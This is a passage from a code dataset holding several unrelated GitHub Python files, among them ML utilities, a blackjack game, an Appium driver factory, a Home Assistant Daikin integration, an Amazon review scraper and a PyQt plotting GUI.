0:\n logger.error('Convert failed with error %d', ret)\n return ret\n\n return 0\n\n\nif __name__ == '__main__':\n now_ = time.time()\n logger.info('')\n logger.info('')\n bcolors.light_cyan(logger.info, '> ' + ' '.join(sys.argv))\n\n ret_ = 0\n try:\n main()\n except Exception as e:\n logger.exception('Uncaught exception: %s', e)\n ret_ = 1\n logger.info('')\n bcolors.light_cyan(logger.info, '> ' + ' '.join(sys.argv))\n logger.info('')\n\n if ret_ == 0:\n bcolors.light_green(logger.info, '[%.3fs] SUCCESS!!!',time.time() - now_)\n else:\n bcolors.light_red(logger.error, '[%.3fs] FAIL!!!', time.time() - now_)\n\n exit(ret_)\n","repo_name":"stoooops/deep-learning-archive","sub_path":"bin/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19348757651","text":"import os\nimport shutil\nfrom tabulate import tabulate\nfrom cProfile import Profile\nimport pstats\nimport matplotlib.pyplot as plt\n\n\ndef plot_losses(training_losses, validation_losses, savepath=\"./losses.png\"):\n fig = plt.figure()\n plt.plot(validation_losses, label=\"Validation set loss\")\n plt.plot(training_losses, label=\"Training set loss\")\n\n plt.legend()\n plt.xlabel(\"Epochs\")\n\n plt.savefig(savepath)\n\n\ndef plot_histograms(self, data):\n fig, axs = plt.subplots(len(data))\n for index, k in enumerate(data):\n if len(data) == 1:\n ax = axs\n else:\n ax = axs[index]\n\n ax.hist(data[k])\n ax.set_label(k)\n\n plt.show()\n\n\ndef dump_values(x, a, z, w, dw, db, epoch):\n dir = \"./epoch_{}_values\".format(epoch)\n\n if os.path.exists(dir) and os.path.isdir(dir):\n shutil.rmtree(dir)\n\n os.makedirs(dir)\n data = {\"a\": a, \"z\": z, \"w\": w, \"dw\": dw, \"db\": db}\n\n for d in data:\n vals = data[d]\n\n for index, arr in enumerate(vals):\n with open(os.path.join(dir, \"{}{}\".format(d, index+1)), \"w\") as f:\n table = tabulate(arr)\n f.write(table + \"\\n\")\n\n with open(os.path.join(dir,\"x\"), \"w\") as f:\n table = tabulate(x)\n f.write(table + \"\\n\")\n\n\ndef profile(sort_args=['cumulative'], print_args=[10]):\n profiler = Profile()\n\n def decorator(fn):\n def inner(*args, **kwargs):\n result = None\n try:\n result = profiler.runcall(fn, *args, **kwargs)\n finally:\n stats = pstats.Stats(profiler)\n stats.strip_dirs().sort_stats(*sort_args).print_stats(*print_args)\n return result\n return inner\n return decorator","repo_name":"adamantmc/backpropagation","sub_path":"nn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32837485576","text":"import random\nfrom card_class import Card\nfrom deck_class import Deck\nfrom hand_class import Hand\n\n\ndef get_correct_input(target_list, user_input, change_to_int=0):\n while user_input not in target_list:\n user_input = input(\"Please enter proper input ==>> \")\n\n if change_to_int == 1:\n return int(user_input)\n else:\n return user_input\n\n\ndef get_user_bet(u_money):\n str_list = []\n for i in range(1, u_money + 1):\n str_list.append(str(i))\n\n print(\"You have $\", u_money, sep=\"\")\n bet = input(\"Please enter your bet in whole USD (You must bet some amount) ==>> \")\n return get_correct_input(str_list, bet, 1)\n\n\ndef get_cpu_bet(cpu_money):\n return random.randint(1, cpu_money)\n\n\ndef get_pot(u_bet, u_money, cpu_bet, cpu_money):\n return (u_bet + cpu_bet), (u_money - u_bet), (cpu_money - 
cpu_bet)\r\n\r\n\r\n\"\"\"The game starts here\"\"\"\r\nplay_again = \"Yes\"\r\nwhile play_again == \"Yes\":\r\n    user_money = 10000\r\n    cpu1_money = 10000\r\n    while user_money > 0 and cpu1_money > 0:\r\n        user_bet = get_user_bet(user_money)\r\n        cpu1_bet = get_cpu_bet(cpu1_money)\r\n        print(\"The computer bet $\", cpu1_bet, sep=\"\")\r\n\r\n        pot, user_money, cpu1_money = get_pot(user_bet, user_money, cpu1_bet, cpu1_money)\r\n\r\n        new_deck = Deck()\r\n        new_deck.shuffle()\r\n        user_hand = Hand()\r\n        cpu1_hand = Hand()\r\n\r\n        user_hand.add_to_hand(new_deck.deal())\r\n        cpu1_hand.add_to_hand(new_deck.deal())\r\n        user_hand.add_to_hand(new_deck.deal())\r\n        cpu1_hand.add_to_hand(new_deck.deal())\r\n\r\n        user_hand.print_hand()\r\n\r\n    play_again = input(\"Would you like to play again? (Enter 'Yes' or 'No') ==>> \")\r\n    play_again = get_correct_input([\"Yes\", \"No\"], play_again)  # comment added\r\n    print(\"Hello World\")\r\n","repo_name":"zrfuhrmann/blackjack_game_2","sub_path":"main_gambling_game.py","file_name":"main_gambling_game.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72097211752","text":"from datetime import timedelta, datetime\nimport requests\nimport json\nfrom pytz import timezone\nfrom settings import log\nimport settings\n\n\n# Old function\n# def utc_to_local(utc_dt):\n#     return utc_dt.astimezone(settings.TIMEZONE)\n\ndef utc_to_local(utc_dt, hours):\n    return utc_dt + timedelta(hours=hours)\n\n\ndef getUserState(chat_id):\n    r = requests.get(settings.BASE_URL + settings.get_tg_users +\n                     str(chat_id), headers=settings.master_token)\n    responce = r.json()\n    user_id = json.loads(json.dumps(responce['id']))\n    is_active = json.loads(json.dumps(responce['is_active']))\n    log.info(f\"request user state for id: {user_id} by {chat_id}\")\n    if is_active:\n        return True\n    else:\n        return False\n\n\ndef getUserID(chat_id):\n    r = requests.get(settings.BASE_URL + settings.get_tg_users +\n                     str(chat_id), headers=settings.master_token)\n    responce = r.json()\n    user_id = json.loads(json.dumps(responce['id']))\n    log.info(f\"request user id ({user_id}) from: {chat_id}\")\n    return user_id\n\n\ndef getData(user_id):\n    r = requests.get(settings.BASE_URL + settings.get_data +\n                     str(user_id), headers=settings.master_token)\n    responce = r.json()\n    data = json.loads(json.dumps(responce[0]['data']))\n    date = utc_to_local(datetime.fromisoformat(responce[0]['datetime']), 9)\n    reply_date_msg = f\"Time: {date.strftime('%H:%M %d.%m.%Y')}\"\n    reply_data_msg = \"\\n\".join(f'{k}: {v}' for k, v in data.items())\n    return reply_date_msg + \"\\n\" + reply_data_msg\n","repo_name":"ab-413/iot-bot","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1669485756","text":"class Solution:\n    def detectCapitalUse(self, word: str) -> bool:\n        answer, count, index = False, 0, 0\n        for i, c in enumerate(word):\n            if ord('A') <= ord(c) <= ord('Z'):\n                count += 1\n                index = i\n        \n        if (count == len(word)) or (count == 1 and index == 0) or count == 0:\n            answer = True\n        \n        return answer","repo_name":"slackjawed12/codetest","sub_path":"LeetCode/Easy/0520-detect-capital/0520-detect-capital.py","file_name":"0520-detect-capital.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2298991577","text":"from appium import webdriver\n\nfrom library.mobile import 
configs, parallel\nfrom library.mobile.devices import get_device_id\n\n\nclass SingletonFactory(object):\n    \"\"\"\n    A factory of the same instances of injected classes.\n    \"\"\"\n\n    # a mapping between the name of a class and the instance.\n    mappings = {}\n\n    @staticmethod\n    def get_instance(device_id: str):\n        if device_id in SingletonFactory.mappings:\n            return SingletonFactory.mappings[device_id]\n        else:\n            return None\n\n    @staticmethod\n    def build(device_id, **constructor_args):\n        \"\"\"\n        Builds an instance of the given class pointer together\n        with the provided constructor arguments.\n        Returns the SAME instance for a given class.\n\n        :param device_id: A pointer to the device driver instance.\n        :param constructor_args: The arguments for the class instance.\n        :return: An instance of the provided class.\n        \"\"\"\n\n        # if the class instance is mapped, then retrieve it.\n        instance_ = SingletonFactory.get_instance(device_id)\n        # else create the instance and map it to the class name.\n        if not instance_:\n            instance_ = webdriver.Remote(**constructor_args)\n            SingletonFactory.mappings[str(device_id)] = instance_\n\n        return instance_\n\n\ndef get_appium_server():\n    import json\n    import os\n\n    # Load default capabilities per platform\n    caps_path = os.path.join(configs.PROJECT_PATH, \"configs\", \"capabilities.json\")\n    with open(caps_path) as caps_file:\n        appium_config = json.load(caps_file).get(\"appium\")\n    port = parallel.device_index(appium_config[\"availablePorts\"])\n    return \"http://{0}:{1}/wd/hub\".format(appium_config[\"ip\"], port)\n\n\ndef create_appium_session(udid: str, capabilities: dict):\n    return SingletonFactory.build(\n        udid, command_executor=get_appium_server(), desired_capabilities=capabilities,\n    )\n\n\ndef get_driver(udid: str = get_device_id()) -> webdriver.Remote:\n    \"\"\"\n    Return the same instance to the Appium driver.\n    \"\"\"\n    if udid in SingletonFactory.mappings:\n        return SingletonFactory.mappings[udid]\n    else:\n        return create_appium_session(get_device_id(), configs.CAPABILITIES)\n\n\ndef quit_driver():\n    \"\"\"\n    Close Mobile app and delete reference at singleton, so device_id can re-initiate\n    \"\"\"\n    udid = get_device_id()\n    driver = get_driver(udid)\n    driver.quit()\n    SingletonFactory.mappings.pop(udid)\n","repo_name":"penguji/sancaQA","sub_path":"library/mobile/drivers.py","file_name":"drivers.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71707244072","text":"from sympy import symbols, diff\n\n\nx, y = symbols('x y')\n\nf = (x + 1)**2 + 8 * (y ** 2) - 3 * x - y + 1\ng = ((x + 1)**2 + y**2) * ((x - 1)**2 + y**2)\n\ndf_dx = diff(f, x)\ndf_dy = diff(f, y)\n\ndg_dx = diff(g, x)\ndg_dy = diff(g, y)\n\nprint(df_dx, df_dy)\nprint(dg_dx, dg_dy)\n","repo_name":"anutabutsko/algorithms","sub_path":"src/optimization/derivative_calc.py","file_name":"derivative_calc.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28475233718","text":"import os\nimport os.path\nimport logging\nimport pygsheets\nfrom infra.run.common import IS_WINDOWS\n\n\nclass Sheets(object):\n    \"\"\"\n    Wrapper for google sheets using pygsheets.\n    \"\"\"\n    SPAM_LOGGERS = ('googleapiclient.discovery', 'oauth2client.transport', 'oauth2client.crypt', 'oauth2client.client')\n    _logger = logging.getLogger('google.sheets')\n\n\n    def __init__(self, service_account):\n        self._sheets = 
pygsheets.authorize(service_file=service_account, no_cache=IS_WINDOWS)\n        self._worksheet_cache = {}\n\n    def append_worksheet_table(self, sheet_name, worksheet, *values):\n        _key = (sheet_name, worksheet)\n        if _key not in self._worksheet_cache:\n            sheet = self._sheets.open(sheet_name)\n            worksheet = sheet.worksheet_by_title(worksheet)\n            if worksheet is None:\n                raise KeyError('no %s worksheet in %s sheet' % _key[::-1])\n            self._logger.debug('open %s.%s worksheet', *_key)\n            self._worksheet_cache[_key] = worksheet\n        self._worksheet_cache[_key].append_table(values=values)\n","repo_name":"arduino12/infra","sub_path":"modules/google/sheets/sheets.py","file_name":"sheets.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15196583849","text":"N, K = map(int, input().split())\r\nAns = 0\r\n\r\nif K == 0:\r\n    print(N**2)\r\nelse:\r\n    def Mods(i, N, K): # counts how many x in [1, N] satisfy x % i >= K\r\n        lim = N//i\r\n        pattern = i - K\r\n        total = lim * pattern\r\n        if N - i * lim < K:\r\n            return total\r\n        else:\r\n            extra = N - i * lim - K + 1\r\n            return total + extra\r\n\r\n    for i in range(K+1, N+1):\r\n        Ans += Mods(i, N, K)\r\n    print(Ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc091/B/3635255.py","file_name":"3635255.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"10890910663","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"TheLogicMaster\",\n    version=\"0.0.1\",\n    author=\"Justin Marentette\",\n    author_email=\"justinmarentette11@gmail.com\",\n    description=\"A Webkinz mini-game bot\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/TheLogicMaster/WebkinzBot\",\n    packages=setuptools.find_packages(),\n    install_requires=[\n        'opencv-python', 'pynput', 'numpy', 'colormath', 'pyscreenshot', 'pyautogui', 'Pillow'\n    ],\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"Operating System :: OS Independent\",\n    ],\n    python_requires='>=3.6',\n)","repo_name":"TheLogicMaster/WebkinzBot","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12286124989","text":"from charles_dev.daikin_device import DaikinDevice\nfrom homeassistant.helpers.entity import DeviceInfo, Entity\n\nfrom .const import _LOGGER, DOMAIN\n\n\nclass DaikinEntity(Entity):\n    \"\"\"Base class for Daikin stuff.\"\"\"\n\n    _attr_has_entity_name = True\n\n    def __init__(self, device: DaikinDevice) -> None:\n        self._device = device\n        self._attr_unique_id = device.mac\n\n        self._attr_device_info = DeviceInfo(\n            identifiers={(DOMAIN, device.mac)},\n            name=device.name,\n            manufacturer=\"Daikin\",\n        )\n        device.add_update_callback(self.on_data_updated)\n\n    def on_data_updated(self):\n        \"\"\"Callback from the DaikinDevice class when the data model changes.\"\"\"\n        _LOGGER.debug(\"Device Data updated:\")\n        self._attr_device_info[\"model\"] = self._device.device_data.manufacturer.text\n        self._attr_device_info[\"name\"] = self._device.device_data.name\n        
self.async_schedule_update_ha_state()\n","repo_name":"crossan007/hacs-daikin-cloud-na","sub_path":"custom_components/daikinone/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10785172236","text":"from selectorlib import Extractor\nimport requests \nimport json \nfrom time import sleep\nimport csv\nfrom dateutil import parser as dateparser\n\n# Create an Extractor by reading from the YAML file\ntry:\n e = Extractor.from_yaml_file('selectors.yml')\nexcept:\n e = Extractor.from_yaml_file('Scraper/selectors.yml')\n\ndef scrape(url): \n headers = {\n 'authority': 'www.amazon.com',\n 'pragma': 'no-cache',\n 'cache-control': 'no-cache',\n 'dnt': '1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'none',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-dest': 'document',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n }\n\n # Download the page using requests\n print(\"Downloading %s\"%url)\n r = requests.get(url, headers=headers)\n # print(r.text)\n # Simple check to check if page was blocked (Usually 503)\n if \"To discuss automated access to Amazon data\" in r.text:\n print(\"Page %s was blocked by Amazon. Please try using better proxies\\n\"%url)\n # Pass the HTML of the page and create \n # print(e.extract(r.text))\n return e.extract(r.text)\n\n# product_data = []\ndef read_urls(urls):\n\n with open('data.csv','w') as outfile:\n writer = csv.DictWriter(outfile, fieldnames=[\"title\",\"content\",\"date\",\"variant\",\"images\",\"verified\",\"author\",\"rating\",\"product\",\"url\"],quoting=csv.QUOTE_ALL)\n writer.writeheader()\n for url in urls:\n data = scrape(url)\n try:\n\n if data:\n for r in data['reviews']:\n r[\"product\"] = data[\"product_title\"]\n r['url'] = url\n # print(r)\n if 'verified' in r:\n if 'Verified Purchase' in r['verified']:\n r['verified'] = 'Yes'\n else:\n r['verified'] = 'no'\n r['rating'] = r['rating'].split(' out of')[0]\n date_posted = r['date'].split('on ')[-1]\n if r['images']:\n r['images'] = \"\\n\".join(r['images'])\n r['date'] = dateparser.parse(date_posted).strftime('%d %b %Y')\n writer.writerow(r)\n\n except:\n print(\"No data\")\n\n \n\ndef genrate_urls(url):\n\n id = url.split(\"/\")[5]\n stars = ['one','two','three','four','five']\n\n print(id)\n links = []\n for i in range(2,11):\n links.append(\"https://www.amazon.in/product-reviews/\"+id+\"/ref=cm_cr_arp_d_paging_btm_next_\"+str(i)+\"?ie=UTF8&reviewerType=all_reviews&pageNumber=\"+str(i))\n \n\n\n return links\n\n\ndef generate_data(url):\n try:\n read_urls(genrate_urls(url))\n except Exception as e:\n print(\"Error \",e)\n\n\nif __name__ == '__main__':\n generate_data(\"https://www.amazon.in/OnePlus-Nord-Marble-128GB-Storage/product-reviews/B08695ZSP6/ref=cm_cr_dp_d_show_all_btm?ie=UTF8&reviewerType=all_reviews\")\n\n\n\n # sleep(5)","repo_name":"swapnillondhe24/Sentiment","sub_path":"Scraper/reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40034510638","text":"\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\r\nfrom PyQt5.QtWidgets import 
QShortcut\r\n\r\n\r\n\r\nfrom PyQt5.QtCore import QObject, pyqtSignal\r\n\r\n\r\nimport os,sys\r\nfrom os import path\r\ndirname = path.dirname(__file__)\r\nfname = \"frmMain.ui\"\r\nfpath = path.join(dirname, fname)\r\n\r\nfrom dataGuiBaseClasses import *\r\n\r\n\r\nbackGround = '#FFF'\r\nforeGround = 'k'\r\n\r\npg.setConfigOption('background', backGround)\r\npg.setConfigOption('foreground', foreGround)\r\npg.setConfigOptions(antialias=True)\r\n\r\nfrom frmLoadData import frmLoadData\r\nfrom frmShotChannel import frmShotChannel\r\nfrom frmComAction import frmComAction\r\nfrom frmParameterFilter import frmParameterFilter\r\n\r\n\r\n\r\nclass frmMainWindow(QtWidgets.QFrame, dataGuiBaseClass):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(fpath, self)\r\n\r\n dataGuiBaseClass().reset()\r\n\r\n self.lstWidgetList = [getattr(self, n) for n in dir(self) if 'lst' in n]\r\n for lst in self.lstWidgetList:\r\n QShortcut(QKeySequence(QtCore.Qt.Key_Escape), lst, lst.clearSelection,context=QtCore.Qt.WidgetShortcut)\r\n\r\n\r\n #initiate the frames\r\n\r\n #set frmLoadData\r\n self.frmLoadData = frmLoadData()\r\n # self.frmLoadData.setupUi(self.frmLoadData)\r\n self.gridLayout_2.addWidget(self.frmLoadData, 0, 0, 1, 1)\r\n\r\n\r\n #set frmComAction\r\n\r\n self.Ui_frmComAction = frmComAction(displayType = 'list')\r\n # self.Ui_frmComAction.setupUi(self.frmComAction)\r\n self.gridLayout.addWidget(self.Ui_frmComAction, 0, 2, 2, 1)\r\n\r\n\r\n\r\n\r\n #make paramFilterLayout\r\n\r\n self.Ui_frmParamFilter = frmParameterFilter()\r\n # self.Ui_frmParamFilter.setupUi(self.frmParameterFilter)\r\n self.gloParamFilter.addWidget(self.Ui_frmParamFilter, 0, 0, 1, 1)\r\n\r\n\r\n self.Ui_frmComAction_2 = frmComAction(displayType = 'table')\r\n # self.Ui_frmComAction_2.setupUi(self.frmComAction_2)\r\n self.gridLayout_5.addWidget(self.Ui_frmComAction_2, 0, 1, 2, 1)\r\n\r\n\r\n\r\n #connect signals\r\n\r\n self.frmLoadData.sigLoaded.connect(self.updateAfterLoading)\r\n\r\n\r\n #self.Ui_frmShotChannel.sigChannelListDoubleClicked.connect(functools.partial(self.plotBasic,self.Ui_frmShotChannel,self.Ui_frmWindowLayout,self.Ui_frmAction1))\r\n\r\n self.Ui_frmParamFilter.sigFilterChanged.connect(self.updateChannelTable)\r\n\r\n\r\n #connect two window lists\r\n self.Ui_frmComAction.sigWindowOpened.connect(self.Ui_frmComAction_2.updateAfterWindowOpened)\r\n self.Ui_frmComAction_2.sigWindowOpened.connect(self.Ui_frmComAction.updateAfterWindowOpened)\r\n\r\n\r\n self.Ui_frmComAction.sigIvDataAdded.connect(self.updateAfterLoading)\r\n self.Ui_frmComAction_2.sigIvDataAdded.connect(self.updateAfterLoading)\r\n self.Ui_frmComAction.sigArithmeticsDataAdded.connect(self.updateAfterLoading)\r\n self.Ui_frmComAction_2.sigArithmeticsDataAdded.connect(self.updateAfterLoading)\r\n\r\n\r\n\r\n\r\n\r\n\r\n def updateAfterLoading(self):\r\n\r\n self.Ui_frmComAction.updateChannelOptions(paramDf = self.params)\r\n self.Ui_frmComAction_2.updateChannelOptions(paramDf = self.Ui_frmParamFilter.filteredParamDf)\r\n self.Ui_frmParamFilter.updateParamList()\r\n\r\n def updateChannelTable(self):\r\n self.Ui_frmComAction_2.updateChannelOptions(self.Ui_frmParamFilter.filteredParamDf)\r\n\r\n\r\n\r\n\r\n def openNewWindow(self):\r\n windex = len(self.ws)\r\n glw = pg.GraphicsLayoutWidget()\r\n glw.resize(800,600)\r\n\r\n name = 'Window %i' % windex\r\n glw.setWindowTitle(name)\r\n glw.show()\r\n glw.windex =windex\r\n\r\n\r\n\r\n self.ws.append(glw)\r\n self.ps.append([])\r\n self.ds.append([])\r\n\r\n self.sigWindowOpened.emit()\r\n 
return windex\r\n\r\n def openNewWindow1(self):\r\n glw = pg.GraphicsLayoutWidget()\r\n glw.resize(800,600)\r\n windex = self.ws.count()\r\n name = 'Window %i' % windex\r\n glw.setWindowTitle(name)\r\n glw.show()\r\n glw.index =windex\r\n\r\n self.Ui_frmWindowLayout.windowListboxItem.nameList.append(name)\r\n self.Ui_frmWindowLayout.windowListboxItem.itemList.append(glw)\r\n self.Ui_frmWindowLayout.windowListboxItem.listInBox()\r\n\r\n return windex\r\n\r\n\r\n\r\n def addNewPlot(self,windex,location):\r\n pindex = len(self.ps[windex])\r\n p = pg.PlotItem()\r\n p.pindex = pindex\r\n p.location = location\r\n p.addLegend()\r\n p.legend.setScale(self.legendScale)\r\n self.ws[windex].addItem(p,location[0],location[1],location[2],location[3])\r\n self.ps[windex].append(p)\r\n self.ds[windex].append([])\r\n return pindex\r\n\r\n def addNewDataItem(self, windex,pindex,plotType,dataParam,processParam):\r\n\r\n dindex = len(self.ds[windex][pindex])\r\n\r\n\r\n pen = pg.mkPen(self.penColors[dindex%len(self.penColors)],width=self.penWidth)\r\n #pen = pg.mkPen('k',width=1)\r\n item = pg.PlotDataItem(pen=pen)\r\n item.plotType = plotType\r\n item.dataParam = dataParam\r\n item.dindex = dindex\r\n item.processParam = processParam\r\n item.pen = pen\r\n\r\n item.rawData = self.getData(dataParam)\r\n\r\n self.exeProcessFunction(item)\r\n self.ps[windex][pindex].addItem(item)\r\n self.ds[windex][pindex].append(item)\r\n return dindex\r\n\r\n def addNewImageItem (self, windex,pindex,plotType,dataParam,processParam):\r\n dindex = len(self.ds[windex][pindex])\r\n\r\n\r\n item = pg.ImageItem()\r\n item.plotType = plotType\r\n item.dataParam = dataParam\r\n item.dindex = dindex\r\n item.processParam = processParam\r\n\r\n\r\n item.rawData = self.getData(dataParam)\r\n\r\n self.exeProcessFunction(item)\r\n self.ps[windex][pindex].addItem(item)\r\n self.ds[windex][pindex].append(item)\r\n return dindex\r\n\r\n\r\n\r\n def updateYAxis(self,ax,*args,**kargs):\r\n vb = ax.linkedView()\r\n dataItems = [x for x in vb.addedItems if type(x)==type(pg.PlotDataItem())]\r\n axisArg = self.axisArgs\r\n yUnits = np.unique([item.yUnit for item in dataItems])\r\n names = [item.yName for item in dataItems]\r\n yUnit,yLabel = '',''\r\n if len(yUnits)==1:\r\n yUnit = yUnits[0]\r\n commonWords = []\r\n for word in names[0].split(' '):\r\n present = True\r\n for name in names:\r\n if word.upper() not in [x.upper() for x in name.split(' ')]:\r\n present = False\r\n if present:\r\n commonWords.append(word)\r\n commonLabels =[word for word in commonWords if word.upper() in self.plotYLabelTypes or word in self.plotYLabelTypes]\r\n if len(commonLabels)>0:\r\n maxLen = np.max([len(x) for x in commonLabels])\r\n yLabel = [x for x in commonLabels if len(x)==maxLen][0]\r\n\r\n ax.setLabel(yLabel,units = yUnit,**axisArg['labelStyleArgs'])\r\n\r\n ax.tickFont = axisArg['tickFont']\r\n ax.setPen(axisArg['axisPen'])\r\n ax.setStyle(tickLength = axisArg['tickLength'])\r\n\r\n ax.setWidth(w=axisArg['yAxisWidth'])\r\n ax.setStyle(tickTextOffset = axisArg['yTickTextOffset'])\r\n return ax\r\n\r\n def updateXAxis(self,ax,*args,**kargs):\r\n vb = ax.linkedView()\r\n dataItems = [x for x in vb.addedItems if type(x)==type(pg.PlotDataItem())]\r\n axisArg = self.axisArgs\r\n xUnits = np.unique([item.xUnit for item in dataItems])\r\n names = [item.xName for item in dataItems]\r\n xUnit,xLabel = '',''\r\n\r\n if len(xUnits)==1:\r\n xUnit = xUnits[0]\r\n commonWords = []\r\n for word in names[0].split(' '):\r\n present = True\r\n for name in names:\r\n if 
word.upper() not in [x.upper() for x in name.split(' ')]:\r\n present = False\r\n if present:\r\n commonWords.append(word)\r\n commonLabels =[word for word in commonWords if word.upper() in self.plotXLabelTypes or word in self.plotXLabelTypes]\r\n if len(commonLabels)>0:\r\n maxLen = np.max([len(x) for x in commonLabels])\r\n xLabel = [x for x in commonLabels if len(x)==maxLen][0]\r\n\r\n ax.setLabel(xLabel,units = xUnit,**axisArg['labelStyleArgs'])\r\n ax.tickFont = axisArg['tickFont']\r\n ax.setPen(axisArg['axisPen'])\r\n ax.setStyle(tickLength = axisArg['tickLength'])\r\n ax.setHeight(h=axisArg['xAxisHeight'])\r\n ax.setStyle(tickTextOffset = axisArg['xTickTextOffset'])\r\n return ax\r\n\r\n def updateViews(self,p):\r\n vbs = [x for x in p.scene().items() if type(x) ==type(pg.ViewBox())][1:]\r\n for vb in vbs:\r\n vb.setGeometry(p.vb.sceneBoundingRect())\r\n ## need to re-update linked axes since this was called\r\n ## incorrectly while views had different shapes.\r\n ## (probably this should be handled in ViewBox.resizeEvent)\r\n vb.linkedViewChanged(p.vb,vb.XAxis)\r\n\r\n\r\n\r\n\r\n\r\n def plotBasic(self, shotChannelItem, windowLayoutItem,actionItem):\r\n\r\n nPlotRow,nPlotColumn = 1,1\r\n windex,pindexes,dataParam,processParam = self.getInitialInfo(shotChannelItem, windowLayoutItem,actionItem,nPlotRow=nPlotRow,nPlotColumn=nPlotColumn)\r\n if windex ==None:\r\n return\r\n\r\n #prepare dataParams\r\n dataParamList = [dataParam[dataParam.index==i] for i in range(len(dataParam))]\r\n pTypeList = self.pTypeBasicKey\r\n for dataParam in dataParamList:\r\n #dindex = self.addNewDataItem(windex,pindexes[0][0],pTypeList, dataParam,processParam)\r\n dindex = self.addNewDataItem(windex,pindexes[0][0],pTypeList, dataParam,processParam)\r\n self.updateXAxis(self.ps[windex][pindexes[0][0]].getAxis('bottom'))\r\n self.updateYAxis(self.ps[windex][pindexes[0][0]].getAxis('left'))\r\n\r\n windowLayoutItem.lstWindow.item(windex).setSelected(True)\r\n windowLayoutItem.updatePlotLayouts()\r\n if self.selectPlot:\r\n windowLayoutItem.tblPlot1.item(self.tempSelectedRow,self.tempSelectedColumn).setSelected(True)\r\n\r\n\r\n\r\n\r\n\r\n def getInitialInfo(self,shotChannelItem, windowLayoutItem,actionItem,\r\n nPlotRow=1,nPlotColumn=1):\r\n #print (\"begin getInitialInfo\")\r\n # return if shotnum or channel is not selected\r\n if not shotChannelItem.selectedChannelIDs:\r\n print (\"shotchannel not selected\")\r\n return None,None,None,None\r\n\r\n if len(windowLayoutItem.lstWindow.selectedItems())>1:\r\n print (\"too many windows\")\r\n return None,None,None,None\r\n windex,location = self.getStartingLocation(windowLayoutItem)\r\n pindexes = self.getPindexes(windex=windex,location=location, nPlotRow=nPlotRow, nPlotColumn=nPlotColumn)\r\n if pindexes == None:\r\n print(\"no pindex\")\r\n return None,None,None,None\r\n #print (\"made it\")\r\n # get indexes for channels\r\n\r\n processParam = actionItem.getProcessParams()\r\n dataParam=self.params[self.params[self.channelIdKey].isin(np.array(shotChannelItem.selectedChannelIDs).astype(self.params[self.channelIdKey].dtype))].reset_index(drop=True)\r\n return windex,pindexes,dataParam,processParam\r\n\r\n\r\n\r\n def plotPsd(self,shotChannelItem, windowLayoutItem,actionItem):\r\n self.times = []\r\n\r\n nPlotRow,nPlotColumn = 2,1\r\n windex,pindexes,dataParam,processParam = self.getInitialInfo(shotChannelItem, windowLayoutItem,actionItem,nPlotRow=nPlotRow,nPlotColumn=nPlotColumn)\r\n if windex == None:\r\n return\r\n\r\n #prepare dataParams\r\n dataParamList = 
